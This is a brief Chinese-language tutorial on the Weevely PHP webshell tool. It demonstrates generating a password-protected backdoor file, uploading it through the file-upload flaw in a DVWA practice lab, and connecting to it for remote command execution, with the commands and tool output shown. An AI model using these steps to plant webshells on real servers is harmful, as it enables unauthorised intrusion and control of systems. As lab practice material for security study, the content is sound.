weevley简介
Weevely是一款开源项目.只支持(PHP) Webshell,可以模拟类似Telnet的连接,Weevely支持HTTP和SOCKS代理并使用Tor匿名网络。开源 https://github.com/epinna/weevely3
演示
靶机 dvwa Vulnerability: File Upload low
生成后门
weevely generate <password 设置密码> <path 路径可以指定绝对路径>
weevely generate 123456 test.php
Generated 'test.php' with password '123456' of 742 byte size.
生成的test.php后门上传到服务器 复制URL链接
weevely http://192.168.1.108/dvwa/hackable/uploads/test.php 123456
[+] weevely 3.6.2
[+] Target: 192.168.1.108
[+] Session: /root/.weevely/sessions/192.168.1.108/test_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.